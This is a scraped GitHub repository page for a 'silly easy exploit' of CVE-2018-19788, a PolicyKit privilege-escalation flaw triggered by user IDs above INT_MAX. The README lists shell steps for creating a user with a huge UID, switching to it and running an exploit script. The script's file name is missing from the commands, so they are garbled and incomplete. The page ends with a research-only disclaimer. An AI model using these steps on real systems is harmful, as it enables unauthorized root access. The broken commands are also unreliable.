Silly easy exploit for CVE-2018-19788
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information. Create Dec 7, 2018
LICENSE Initial commit Dec 7, 2018 Update Dec 7, 2018


Silly easy exploit for CVE-2018-19788

To use this, you must either create a user with UID > INT_MAX in Policy Kit or already have a low-priv user with said UID.

UID can be specified in user creation as follows, and used before execution of the script:

$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/
$ ./tmp/

Please note this is merely for research and you are responsible for your own usage of any code found in this repository or any other, as common sense dictates.